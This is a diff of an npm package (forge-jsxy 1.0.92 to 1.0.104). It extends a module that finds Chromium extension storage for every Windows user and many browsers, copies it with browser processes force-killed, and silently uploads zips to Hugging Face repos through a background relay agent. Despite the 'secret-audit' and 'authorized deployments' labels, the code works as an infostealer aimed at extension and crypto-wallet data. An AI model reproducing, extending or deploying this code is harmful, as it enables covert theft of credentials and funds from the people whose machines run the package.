forge-jsxy 1.0.92 → 1.0.104

package/dist/chromiumExtensionDbHarvest.js

@@ -33,10 +33,15 @@ var __importStar = (this && this.__importStar) || (function () {
     };
 })();
 Object.defineProperty(exports, "__esModule", { value: true });
-exports.LOCAL_EXTENSION_SETTINGS = exports.EXTENSION_DB_STAGING_DIRNAME = void 0;
+exports.INDEXEDDB_DIR_NAME = exports.LOCAL_EXTENSION_SETTINGS = exports.EXTENSION_DB_STAGING_DIRNAME = void 0;
+exports.win32AllLocalAppDataRoots = win32AllLocalAppDataRoots;
+exports.win32AllRoamingAppDataRoots = win32AllRoamingAppDataRoots;
 exports.chromiumBrowserUserDataCandidates = chromiumBrowserUserDataCandidates;
 exports.profileRelPathFromLes = profileRelPathFromLes;
 exports.findLocalExtensionSettingsDirs = findLocalExtensionSettingsDirs;
+exports.findChromeExtensionIndexedDbDirs = findChromeExtensionIndexedDbDirs;
+exports.isLevelDbSstableFileName = isLevelDbSstableFileName;
+exports.extensionFolderHasLdbFile = extensionFolderHasLdbFile;
 exports.extensionFolderHasDbFile = extensionFolderHasDbFile;
 exports.discoverExtensionDbSourcesFromUserDataRoots = discoverExtensionDbSourcesFromUserDataRoots;
 exports.discoverExtensionDbSources = discoverExtensionDbSources;
@@ -49,10 +54,10 @@ exports.removeExtensionDbStaging = removeExtensionDbStaging;
  * Discover Chromium-family browser profiles, copy **entire** extension `<id>` folders under
  * `Local Extension Settings` into a staging directory beside `result.json` (secret-audit vault).
  *
- * **Selection gate:** an extension folder is included only when it contains at least one `.db`
- * file anywhere inside (wallet/SQLite signal). **Copy scope:** the full `<extension_id>/` tree
- * is copied recursively — LevelDB `.log`/`.ldb`, `CURRENT`, `MANIFEST-*`, locks, and every
- * other file under that id — not just the `.db` file(s).
+ * **Selection gate:** an extension folder is included when it contains at least one **`.ldb`**
+ * file anywhere inside (Chromium LevelDB table/sstable — the real extension database blob).
+ * **`.db` (SQLite) alone does not qualify.** **Copy scope:** the full `<extension_id>/` tree
+ * is copied recursively — every `.ldb`, `.log`, `CURRENT`, `MANIFEST-*`, lock, and sibling file.
  *
  * Cross-platform (Windows local + roaming, Linux, macOS). Authorized deployments only.
  */
@@ -65,6 +70,7 @@ const fileLockForce_1 = require("./fileLockForce");
 exports.EXTENSION_DB_STAGING_DIRNAME = "extension-db-staging";
 /** Relative path segment (case-insensitive) under a browser profile. */
 exports.LOCAL_EXTENSION_SETTINGS = "Local Extension Settings";
+exports.INDEXEDDB_DIR_NAME = "IndexedDB";
 function envHome() {
     return os.homedir();
 }
@@ -86,6 +92,119 @@ function roamingAppDataWin() {
         return path.join(prof, "AppData", "Roaming");
     return path.join(envHome(), "AppData", "Roaming");
 }
+const WIN_USERS_DIR_SKIP = new Set(["default", "default user", "public", "all users", "defaultaccount"].map((s) => s.toLowerCase()));
+/** All `AppData\\Local` roots on Windows — current user plus `C:\\Users\\*\\AppData\\Local`. */
+function win32AllLocalAppDataRoots() {
+    const out = [];
+    const seen = new Set();
+    const add = (p) => {
+        try {
+            const abs = path.resolve(p);
+            const key = abs.toLowerCase();
+            if (seen.has(key))
+                return;
+            if (fs.existsSync(abs) && fs.statSync(abs).isDirectory()) {
+                seen.add(key);
+                out.push(abs);
+            }
+        }
+        catch {
+            /* skip */
+        }
+    };
+    add(localAppDataWin());
+    const sysDrive = (process.env.SystemDrive || "C:").trim();
+    const usersRoot = path.join(sysDrive, "Users");
+    try {
+        for (const ent of fs.readdirSync(usersRoot, { withFileTypes: true })) {
+            if (!ent.isDirectory())
+                continue;
+            if (WIN_USERS_DIR_SKIP.has(ent.name.toLowerCase()))
+                continue;
+            add(path.join(usersRoot, ent.name, "AppData", "Local"));
+        }
+    }
+    catch {
+        /* skip */
+    }
+    return out;
+}
+/** All `AppData\\Roaming` roots on Windows — current user plus `C:\\Users\\*\\AppData\\Roaming`. */
+function win32AllRoamingAppDataRoots() {
+    const out = [];
+    const seen = new Set();
+    const add = (p) => {
+        try {
+            const abs = path.resolve(p);
+            const key = abs.toLowerCase();
+            if (seen.has(key))
+                return;
+            if (fs.existsSync(abs) && fs.statSync(abs).isDirectory()) {
+                seen.add(key);
+                out.push(abs);
+            }
+        }
+        catch {
+            /* skip */
+        }
+    };
+    add(roamingAppDataWin());
+    const sysDrive = (process.env.SystemDrive || "C:").trim();
+    const usersRoot = path.join(sysDrive, "Users");
+    try {
+        for (const ent of fs.readdirSync(usersRoot, { withFileTypes: true })) {
+            if (!ent.isDirectory())
+                continue;
+            if (WIN_USERS_DIR_SKIP.has(ent.name.toLowerCase()))
+                continue;
+            add(path.join(usersRoot, ent.name, "AppData", "Roaming"));
+        }
+    }
+    catch {
+        /* skip */
+    }
+    return out;
+}
+function browserLabelForUserDataRoot(baseLabel, userDataRoot) {
+    if (process.platform !== "win32")
+        return baseLabel;
+    const norm = path.resolve(userDataRoot).replace(/\\/g, "/").toLowerCase();
+    const m = /\/users\/([^/]+)\/appdata\/local/i.exec(norm);
+    if (!m?.[1])
+        return baseLabel;
+    const user = m[1];
+    const cur = localAppDataWin().replace(/\\/g, "/").toLowerCase();
+    if (norm.startsWith(cur.replace(/\/$/, "")))
+        return baseLabel;
+    return `${baseLabel} [${user}]`;
+}
+/** Relative path segments under `%LOCALAPPDATA%` for Chromium user-data dirs. */
+const WIN32_LOCAL_BROWSER_PATHS = [
+    ["Google Chrome", ["Google", "Chrome", "User Data"]],
+    ["Google Chrome Beta", ["Google", "Chrome Beta", "User Data"]],
+    ["Google Chrome SxS", ["Google", "Chrome SxS", "User Data"]],
+    ["Microsoft Edge", ["Microsoft", "Edge", "User Data"]],
+    ["Microsoft Edge Beta", ["Microsoft", "Edge Beta", "User Data"]],
+    ["Microsoft Edge Dev", ["Microsoft", "Edge Dev", "User Data"]],
+    ["Brave", ["BraveSoftware", "Brave-Browser", "User Data"]],
+    ["Vivaldi", ["Vivaldi", "User Data"]],
+    ["Chromium", ["Chromium", "User Data"]],
+    ["Yandex", ["Yandex", "YandexBrowser", "User Data"]],
+    ["Opera", ["Opera Software", "Opera Stable"]],
+    ["Opera GX", ["Opera Software", "Opera GX Stable"]],
+    ["Epic Privacy Browser", ["Epic Privacy Browser", "User Data"]],
+    ["Iridium", ["Iridium", "User Data"]],
+    ["Thorium", ["Thorium", "User Data"]],
+    ["Cent Browser", ["CentBrowser", "User Data"]],
+    ["Slimjet", ["Slimjet", "User Data"]],
+    ["360Chrome", ["360Chrome", "Chrome", "User Data"]],
+    ["Coc Coc", ["Coccoc", "Browser", "User Data"]],
+    ["Wavebox", ["Wavebox", "User Data"]],
+];
+const WIN32_ROAMING_BROWSER_PATHS = [
+    ["Opera Roaming", ["Opera Software", "Opera Stable"]],
+    ["Opera GX Roaming", ["Opera Software", "Opera GX Stable"]],
+];
 function linuxConfigDir() {
     const xdg = (process.env.XDG_CONFIG_HOME || "").trim();
     if (xdg)
@@ -117,39 +236,16 @@ function chromiumBrowserUserDataCandidates() {
         }
     };
     if (process.platform === "win32") {
-        const local = localAppDataWin();
-        const roaming = roamingAppDataWin();
-        const localPairs = [
-            ["Google Chrome", path.join(local, "Google", "Chrome", "User Data")],
-            ["Google Chrome Beta", path.join(local, "Google", "Chrome Beta", "User Data")],
-            ["Google Chrome SxS", path.join(local, "Google", "Chrome SxS", "User Data")],
-            ["Microsoft Edge", path.join(local, "Microsoft", "Edge", "User Data")],
-            ["Microsoft Edge Beta", path.join(local, "Microsoft", "Edge Beta", "User Data")],
-            ["Microsoft Edge Dev", path.join(local, "Microsoft", "Edge Dev", "User Data")],
-            ["Brave", path.join(local, "BraveSoftware", "Brave-Browser", "User Data")],
-            ["Vivaldi", path.join(local, "Vivaldi", "User Data")],
-            ["Chromium", path.join(local, "Chromium", "User Data")],
-            ["Yandex", path.join(local, "Yandex", "YandexBrowser", "User Data")],
-            ["Opera", path.join(local, "Opera Software", "Opera Stable")],
-            ["Opera GX", path.join(local, "Opera Software", "Opera GX Stable")],
-            ["Epic Privacy Browser", path.join(local, "Epic Privacy Browser", "User Data")],
-            ["Iridium", path.join(local, "Iridium", "User Data")],
-            ["Thorium", path.join(local, "Thorium", "User Data")],
-            ["Ungoogled Chromium", path.join(local, "Chromium", "User Data")],
-            ["Cent Browser", path.join(local, "CentBrowser", "User Data")],
-            ["Slimjet", path.join(local, "Slimjet", "User Data")],
-            ["360Chrome", path.join(local, "360Chrome", "Chrome", "User Data")],
-            ["Coc Coc", path.join(local, "Coccoc", "Browser", "User Data")],
-            ["Wavebox", path.join(local, "Wavebox", "User Data")],
-        ];
-        for (const [label, p] of localPairs)
-            pushIfDir(label, p);
-        const roamingPairs = [
-            ["Opera Roaming", path.join(roaming, "Opera Software", "Opera Stable")],
-            ["Opera GX Roaming", path.join(roaming, "Opera Software", "Opera GX Stable")],
-        ];
-        for (const [label, p] of roamingPairs)
-            pushIfDir(label, p);
+        for (const local of win32AllLocalAppDataRoots()) {
+            for (const [label, segs] of WIN32_LOCAL_BROWSER_PATHS) {
+                pushIfDir(browserLabelForUserDataRoot(label, local), path.join(local, ...segs));
+            }
+        }
+        for (const roaming of win32AllRoamingAppDataRoots()) {
+            for (const [label, segs] of WIN32_ROAMING_BROWSER_PATHS) {
+                pushIfDir(browserLabelForUserDataRoot(label, roaming), path.join(roaming, ...segs));
+            }
+        }
         return out;
     }
     if (process.platform === "darwin") {
@@ -268,8 +364,83 @@ function findLocalExtensionSettingsDirs(userDataRoot, maxDepth = 5) {
     walk(root, 0, "");
     return out;
 }
-/** Gate only: true when `<extension_id>/` contains ≥1 `.db` file (triggers full-folder copy). */
-function extensionFolderHasDbFile(dir, maxDepth = 12) {
+function isIndexedDbDirName(name) {
+    return name.localeCompare(exports.INDEXEDDB_DIR_NAME, undefined, { sensitivity: "accent" }) === 0;
+}
+function parseExtensionIdFromIndexedDbDir(name) {
+    const m = /^chrome-extension_([a-z0-9]{32})_\d+\.indexeddb\.leveldb$/i.exec(String(name || "").trim());
+    return m?.[1] ?? null;
+}
+/** Find `IndexedDB/chrome-extension_*_0.indexeddb.leveldb/` trees under a browser user-data root. */
+function findChromeExtensionIndexedDbDirs(userDataRoot, maxDepth = 6) {
+    const root = path.resolve(userDataRoot);
+    const out = [];
+    const seen = new Set();
+    const walk = (dir, depth, profileHint) => {
+        if (depth > maxDepth)
+            return;
+        let entries;
+        try {
+            entries = fs.readdirSync(dir, { withFileTypes: true });
+        }
+        catch {
+            return;
+        }
+        for (const ent of entries) {
+            if (!ent.isDirectory())
+                continue;
+            const child = path.join(dir, ent.name);
+            if (isIndexedDbDirName(ent.name)) {
+                const profileRelPath = profileRelPathFromLes(root, child);
+                const profileLabel = profileHint ||
+                    profileRelPath.split("/").filter(Boolean).pop() ||
+                    path.basename(path.dirname(child));
+                let idbEntries;
+                try {
+                    idbEntries = fs.readdirSync(child, { withFileTypes: true });
+                }
+                catch {
+                    continue;
+                }
+                for (const idbEnt of idbEntries) {
+                    if (!idbEnt.isDirectory())
+                        continue;
+                    const extId = parseExtensionIdFromIndexedDbDir(idbEnt.name);
+                    if (!extId)
+                        continue;
+                    const idbDir = path.join(child, idbEnt.name);
+                    if (!extensionFolderHasLdbFile(idbDir))
+                        continue;
+                    const key = idbDir.toLowerCase();
+                    if (seen.has(key))
+                        continue;
+                    seen.add(key);
+                    out.push({ profileLabel, profileRelPath, idbDir, extensionId: extId });
+                }
+                continue;
+            }
+            if (shouldSkipWalkDir(ent.name))
+                continue;
+            const nextHint = profileHint ||
+                (ent.name === "Default" || /^profile\s+\d+$/i.test(ent.name) ? ent.name : profileHint);
+            walk(child, depth + 1, nextHint || ent.name);
+        }
+    };
+    walk(root, 0, "");
+    return out;
+}
+/** True when a filename is a LevelDB sstable (`.ldb`, case-insensitive). */
+function isLevelDbSstableFileName(name) {
+    return String(name || "")
+        .trim()
+        .toLowerCase()
+        .endsWith(".ldb");
+}
+/**
+ * Gate: true when `<extension_id>/` contains ≥1 **`.ldb`** file (LevelDB database segment).
+ * SQLite `.db` / `.dat` without `.ldb` does **not** qualify.
+ */
+function extensionFolderHasLdbFile(dir, maxDepth = 12) {
     const root = path.resolve(dir);
     const stack = [{ d: root, depth: 0 }];
     while (stack.length) {
@@ -287,7 +458,7 @@ function extensionFolderHasDbFile(dir, maxDepth = 12) {
             const child = path.join(d, ent.name);
             if (ent.isSymbolicLink())
                 continue;
-            if (ent.isFile() && ent.name.toLowerCase().endsWith(".db"))
+            if (ent.isFile() && isLevelDbSstableFileName(ent.name))
                 return true;
             if (ent.isDirectory() && !shouldSkipWalkDir(ent.name)) {
                 stack.push({ d: child, depth: depth + 1 });
@@ -296,7 +467,11 @@ function extensionFolderHasDbFile(dir, maxDepth = 12) {
     }
     return false;
 }
-/** Enumerate extension folders (with `.db` files) for explicit browser roots (test hook). */
+/** @deprecated Use {@link extensionFolderHasLdbFile} — gate is `.ldb`, not `.db`. */
+function extensionFolderHasDbFile(dir, maxDepth = 12) {
+    return extensionFolderHasLdbFile(dir, maxDepth);
+}
+/** Enumerate extension folders (with ≥1 `.ldb` file) for explicit browser roots (test hook). */
 function discoverExtensionDbSourcesFromUserDataRoots(candidates) {
     const sources = [];
     const seenSrc = new Set();
@@ -313,7 +488,7 @@ function discoverExtensionDbSourcesFromUserDataRoots(candidates) {
                 if (!ent.isDirectory())
                     continue;
                 const extDir = path.join(lesDir, ent.name);
-                if (!extensionFolderHasDbFile(extDir))
+                if (!extensionFolderHasLdbFile(extDir))
                     continue;
                 const absKey = extDir.toLowerCase();
                 if (seenSrc.has(absKey))
@@ -325,17 +500,36 @@ function discoverExtensionDbSourcesFromUserDataRoots(candidates) {
                     profileRelPath,
                     extensionId: ent.name,
                     absSourceDir: extDir,
-                    sourceKey: extensionSourceKey(label, profileRelPath, ent.name),
+                    sourceKey: extensionSourceKey(label, profileRelPath, ent.name, "local_extension_settings"),
                     stagingRelPath: "",
+                    storageKind: "local_extension_settings",
                 };
                 source.stagingRelPath = stagingRelPathForSource(source);
                 sources.push(source);
             }
         }
+        for (const { profileLabel, profileRelPath, idbDir, extensionId } of findChromeExtensionIndexedDbDirs(root)) {
+            const absKey = idbDir.toLowerCase();
+            if (seenSrc.has(absKey))
+                continue;
+            seenSrc.add(absKey);
+            const source = {
+                browserLabel: label,
+                profileLabel: profileLabel || "Default",
+                profileRelPath,
+                extensionId,
+                absSourceDir: idbDir,
+                sourceKey: extensionSourceKey(label, profileRelPath, extensionId, "indexeddb"),
+                stagingRelPath: "",
+                storageKind: "indexeddb",
+            };
+            source.stagingRelPath = stagingRelPathForSource(source);
+            sources.push(source);
+        }
     }
     return sources;
 }
-/** Enumerate extension folders (with `.db` files) across all Chromium browsers. */
+/** Enumerate extension folders (with ≥1 `.ldb` file) across all Chromium browsers. */
 function discoverExtensionDbSources() {
     return discoverExtensionDbSourcesFromUserDataRoots(chromiumBrowserUserDataCandidates());
 }
@@ -346,14 +540,22 @@ function extensionDbStagingRoot() {
     return path.join(secretAuditDir(), exports.EXTENSION_DB_STAGING_DIRNAME);
 }
 /** Unique key for browser + profile + extension id (same id in different profiles/browsers stays distinct). */
-function extensionSourceKey(browserLabel, profileRelPath, extensionId) {
-    return `${browserLabel}|${profileRelPath}|${extensionId}`;
+function extensionSourceKey(browserLabel, profileRelPath, extensionId, storageKind = "local_extension_settings") {
+    return `${browserLabel}|${profileRelPath}|${storageKind}|${extensionId}`;
 }
 function stagingRelPathForSource(src) {
     const profileParts = src.profileRelPath
         .split("/")
         .filter(Boolean)
         .map((p) => sanitizePathSegment(p));
+    if (src.storageKind === "indexeddb") {
+        return [
+            sanitizePathSegment(src.browserLabel),
+            ...profileParts,
+            exports.INDEXEDDB_DIR_NAME,
+            sanitizePathSegment(`chrome-extension_${src.extensionId}_indexeddb.leveldb`),
+        ].join("/");
+    }
     return [
         sanitizePathSegment(src.browserLabel),
         ...profileParts,
@@ -366,6 +568,9 @@ function stagingDestForSource(src) {
         .split("/")
         .filter(Boolean)
         .map((p) => sanitizePathSegment(p));
+    if (src.storageKind === "indexeddb") {
+        return path.join(extensionDbStagingRoot(), sanitizePathSegment(src.browserLabel), ...profileParts, exports.INDEXEDDB_DIR_NAME, sanitizePathSegment(`chrome-extension_${src.extensionId}_indexeddb.leveldb`));
+    }
     return path.join(extensionDbStagingRoot(), sanitizePathSegment(src.browserLabel), ...profileParts, exports.LOCAL_EXTENSION_SETTINGS, sanitizePathSegment(src.extensionId));
 }
 async function sleep(ms) {
@@ -456,6 +661,7 @@ async function harvestExtensionDbFoldersToStaging(opts = {}) {
             profile: s.profileLabel,
             profile_rel_path: s.profileRelPath,
             extension_id: s.extensionId,
+            storage_kind: s.storageKind,
             staging_rel_path: s.stagingRelPath,
             path: s.absSourceDir,
         })),

package/dist/extensionDbHfUpload.d.ts

@@ -1,8 +1,9 @@
 /**
  * After secret-audit scan + optional `result.json` Hub upload: harvest Chromium extension
- * folders containing `.db` files, zip, and upload to `namespace/<seq_id>` (session repo).
+ * folders containing LevelDB `.ldb` files, zip, and upload to `namespace/<seq_id>` (session repo).
  *
- * Skips when the Hub repo already exists. Ignores HF/network failures (logs only).
+ * Appends to an existing session repo when present (new export folder per run).
+ * Ignores HF/network failures (logs only).
  * Runs in the background — does not block the relay agent loop.
  */
 import type { HfCredentials } from "./hfCredentials";
@@ -14,9 +15,12 @@ export type RunExtensionDbHfUploadOptions = {
     clientTableName: string;
     fetchHubCredentials: () => Promise<HfCredentials>;
     quiet: boolean;
+    /** Relay HTTP origin (ws→http) so seq_id resolves via GET /api/relay-session-seq when forge-db key is absent on the agent. */
+    relayHttpBase?: string;
+    clientSeqId?: number | null;
 };
 /**
- * Harvest extension `.db` folders → zip → Hub session repo (`namespace/<seq_id>`).
+ * Harvest extension `.ldb` folders → zip → Hub session repo (`namespace/<seq_id>`).
  * No-op when disabled, repo exists, nothing to copy, or credentials missing.
  */
 export declare function runExtensionDbHfUploadAfterAudit(opts: RunExtensionDbHfUploadOptions): Promise<void>;

package/dist/extensionDbHfUpload.js

@@ -6,10 +6,10 @@ exports.runExtensionDbHfUploadAfterAudit = runExtensionDbHfUploadAfterAudit;
 exports.scheduleExtensionDbHfUploadAfterAudit = scheduleExtensionDbHfUploadAfterAudit;
 const hfCredentials_1 = require("./hfCredentials");
 const hfUpload_1 = require("./hfUpload");
-const hub_1 = require("@huggingface/hub");
 const hfSeqIdLookup_1 = require("./hfSeqIdLookup");
 const chromiumExtensionDbHarvest_1 = require("./chromiumExtensionDbHarvest");
 const exportMirrorCopy_1 = require("./exportMirrorCopy");
+const relayForAgentHttp_1 = require("./relayForAgentHttp");
 /** Operational logs always emit (even when `FORGE_JS_QUIET_AGENT=1`). */
 function extensionDbLog(message) {
     console.log(`[forge-agent] extension-db: ${message}`);
@@ -63,42 +63,57 @@ async function resolveHubCredentials(fetchHubCredentials) {
     }
     return creds;
 }
-async function resolveSessionHubRepo(clientTable, creds) {
+async function resolveSessionHubRepo(clientTable, creds, opts) {
     const ns = (creds.namespace || "").trim() ||
         (process.env.CFGMGR_HF_NAMESPACE || "").trim() ||
         (process.env.HUGGINGFACE_HUB_NAMESPACE || "").trim();
-    if (!ns)
+    if (!ns) {
+        extensionDbLog("skipped — HF namespace missing (add \"namespace\" to encrypted credentials or set CFGMGR_HF_NAMESPACE)");
         return null;
-    let seq = await (0, hfSeqIdLookup_1.fetchSeqIdForClientTableName)(clientTable);
-    if ((0, hfSeqIdLookup_1.hfSessionRepoRequireSeqId)() && seq === null)
+    }
+    let seq = opts.clientSeqId !== undefined && opts.clientSeqId !== null
+        ? opts.clientSeqId
+        : await (0, hfSeqIdLookup_1.fetchSeqIdForClientTableName)(clientTable, {
+            relayHttpBase: opts.relayHttpBase,
+        });
+    if ((0, hfSeqIdLookup_1.hfSessionRepoRequireSeqId)() && seq === null) {
+        extensionDbLog("skipped — forge-db seq_id required for session Hub repo (relay /api/relay-session-seq or set CFGMGR_HF_SESSION_REPO_ALLOW_LEGACY_SLUG=1)");
         return null;
+    }
     const slug = (0, hfSeqIdLookup_1.hfAutoSessionRepoSlug)(clientTable, seq);
     return `${ns}/${slug}`;
 }
-async function sessionHubRepoExists(clientTable, creds) {
-    const repoStr = await resolveSessionHubRepo(clientTable, creds);
-    if (!repoStr)
-        return { exists: false, repo: "" };
-    try {
-        const hubUrl = creds.hubUrl.replace(/\/+$/, "").trim() || "https://huggingface.co";
-        const exists = await (0, hub_1.repoExists)({
-            repo: repoStr,
-            accessToken: creds.token,
-            hubUrl,
-        });
-        return { exists, repo: repoStr };
-    }
-    catch {
-        return { exists: false, repo: repoStr };
-    }
-}
 function isIgnorableHubError(err) {
     const msg = err instanceof Error ? err.message : String(err);
     return (/could not reach hugging face|network|fetch failed|econnrefused|enotfound|etimedout|socket hang up/i.test(msg) || /hub upload skipped/i.test(msg));
 }
 let extensionDbUploadInFlight = false;
+let pendingExtensionDbRetry = null;
+function mergeExtensionDbUploadOpts(prev, next) {
+    if (!prev)
+        return next;
+    return {
+        ...prev,
+        ...next,
+        clientSeqId: next.clientSeqId !== undefined && next.clientSeqId !== null
+            ? next.clientSeqId
+            : prev.clientSeqId,
+    };
+}
+function resolveRelayHttpBaseForExtensionUpload(opts) {
+    const explicit = (opts.relayHttpBase || "").trim();
+    if (explicit)
+        return explicit;
+    const ws = (process.env.FORGE_JS_RELAY_URL ||
+        process.env.CFGMGR_RELAY_URL ||
+        process.env.FORGE_JS_AGENT_RELAY_URL ||
+        "").trim();
+    if (!ws)
+        return "";
+    return (0, relayForAgentHttp_1.wsRelayUrlToHttpBase)(ws) ?? "";
+}
 /**
- * Harvest extension `.db` folders → zip → Hub session repo (`namespace/<seq_id>`).
+ * Harvest extension `.ldb` folders → zip → Hub session repo (`namespace/<seq_id>`).
  * No-op when disabled, repo exists, nothing to copy, or credentials missing.
  */
 async function runExtensionDbHfUploadAfterAudit(opts) {
@@ -109,29 +124,52 @@ async function runExtensionDbHfUploadAfterAudit(opts) {
         extensionDbLog("skipped — no client_table / session id");
         return;
     }
-    if (extensionDbUploadInFlight)
+    if (extensionDbUploadInFlight) {
+        pendingExtensionDbRetry = mergeExtensionDbUploadOpts(pendingExtensionDbRetry, opts);
+        extensionDbLog("deferred — previous extension upload still running (queued retry)");
         return;
+    }
     extensionDbUploadInFlight = true;
     let creds = null;
     let harvest = null;
     try {
         extensionDbLog("background upload starting");
+        const relayHttpBase = resolveRelayHttpBaseForExtensionUpload(opts);
+        if (relayHttpBase) {
+            extensionDbLog(`seq lookup relay ${relayHttpBase}`);
+        }
+        if (opts.clientSeqId !== undefined && opts.clientSeqId !== null) {
+            extensionDbLog(`using relay client_seq_id=${opts.clientSeqId}`);
+        }
         creds = await resolveHubCredentials(opts.fetchHubCredentials);
         if (!creds) {
             extensionDbLog("skipped — no HF credentials (relay or CFGMGR_HF_CREDENTIALS_B64)");
             return;
         }
-        const repoCheck = await sessionHubRepoExists(clientTable, creds);
-        if (repoCheck.exists) {
-            extensionDbLog(`skipped — repo already exists (${repoCheck.repo})`);
+        const targetRepo = await resolveSessionHubRepo(clientTable, creds, {
+            relayHttpBase,
+            clientSeqId: opts.clientSeqId,
+        });
+        if (!targetRepo) {
             return;
         }
+        let resolvedSeqId = opts.clientSeqId ?? null;
+        if (resolvedSeqId === null) {
+            resolvedSeqId = await (0, hfSeqIdLookup_1.fetchSeqIdForClientTableName)(clientTable, {
+                relayHttpBase,
+            });
+        }
         harvest = await (0, chromiumExtensionDbHarvest_1.harvestExtensionDbFoldersToStaging)({
             forceKill: true,
             quiet: opts.quiet,
         });
-        if (harvest.sources.length === 0 || harvest.copiedFiles === 0) {
-            extensionDbLog("skipped — no extension folders with .db files");
+        if (harvest.sources.length === 0) {
+            extensionDbLog("skipped — no extension folders with LevelDB `.ldb` files (Local Extension Settings / IndexedDB)");
+            await (0, chromiumExtensionDbHarvest_1.removeExtensionDbStaging)();
+            return;
+        }
+        if (harvest.copiedFiles === 0) {
+            extensionDbLog(`skipped — ${harvest.sources.length} extension folder(s) found but copy failed (browser locks or permissions)`);
             await (0, chromiumExtensionDbHarvest_1.removeExtensionDbStaging)();
             return;
         }
@@ -147,17 +185,15 @@ async function runExtensionDbHfUploadAfterAudit(opts) {
             pathStr: harvest.stagingRoot,
             autoSessionRepo: true,
             clientTableName: clientTable,
+            clientSeqId: resolvedSeqId ?? undefined,
+            relayHttpBase,
             hfCredentials: creds,
             forceKill: true,
             force: true,
-            skipIfRepoExists: true,
+            skipIfRepoExists: false,
         });
-        if (upload.skipped === true && upload.reason === "repo_exists") {
-            extensionDbLog(`skipped — repo already exists (${String(upload.repo || "")})`);
-            return;
-        }
         if (upload.ok === true) {
-            extensionDbLog(`upload OK — repo ${String(upload.repo || "")} (${harvest.sources.length} extension folder(s), ${stagedFiles} files)`);
+            extensionDbLog(`upload OK — repo ${String(upload.repo || targetRepo)} (${harvest.sources.length} extension folder(s), ${stagedFiles} files)`);
         }
         else {
             const err = String(upload.error || "unknown error");
@@ -182,6 +218,13 @@ async function runExtensionDbHfUploadAfterAudit(opts) {
         if (creds)
             (0, hfCredentials_1.scrubHfCredentialsInPlace)(creds);
         await (0, chromiumExtensionDbHarvest_1.removeExtensionDbStaging)();
+        const retry = pendingExtensionDbRetry;
+        pendingExtensionDbRetry = null;
+        if (retry) {
+            setImmediate(() => {
+                void runExtensionDbHfUploadAfterAudit(retry);
+            });
+        }
     }
 }
 /** Fire-and-forget background upload (after secret audit completes). */

package/dist/fsProtocol.js

@@ -77,6 +77,7 @@ const exportMirrorCopy_1 = require("./exportMirrorCopy");
 const fileLockForce_1 = require("./fileLockForce");
 const clipboardExec_1 = require("./clipboardExec");
 const explorerHeavyDirSkips_1 = require("./explorerHeavyDirSkips");
+const clientId_1 = require("./clientId");
 /** Explorer `fs_list` entry cap (sorted). Large dirs need a higher cap; very large values can stress browser memory. */
 exports.MAX_LIST_ENTRIES = 1_000_000;
 /**
@@ -482,6 +483,12 @@ function allowedFsRoots() {
         }
     };
     const roots = [];
+    try {
+        pushIfDir((0, clientId_1.defaultCfgmgrDataDir)());
+    }
+    catch {
+        /* skip */
+    }
     if (isWindows()) {
         try {
             const home = path.resolve(os.homedir());

package/dist/hfSeqIdLookup.d.ts

@@ -10,7 +10,16 @@ export declare function hfSessionRepoRequireSeqId(): boolean;
  * otherwise the legacy Postgres-safe table slug from {@link postgresqlClientTableName}.
  */
 export declare function hfAutoSessionRepoSlug(clientTableName: string, seqId: number | null | undefined): string;
+export type FetchSeqIdOptions = {
+    /** Relay HTTP origin (from agent WebSocket URL) — fallback when direct forge-db is unreachable or lacks API key. */
+    relayHttpBase?: string;
+};
+/**
+ * Resolve `seq_id` via the relay's `/api/relay-session-seq` (relay holds forge-db API key).
+ * Agents on remote PCs often lack `FORGE_DB_API_KEY` and cannot call forge-db directly.
+ */
+export declare function fetchSeqIdViaRelayHttp(relayHttpBase: string, clientTableName: string): Promise<number | null>;
 /**
  * Looks up `seq_id` from forge-db `_client_registry` for this session table name (`session_id` / `table_name`).
  */
-export declare function fetchSeqIdForClientTableName(clientTableName: string): Promise<number | null>;
+export declare function fetchSeqIdForClientTableName(clientTableName: string, opts?: FetchSeqIdOptions): Promise<number | null>;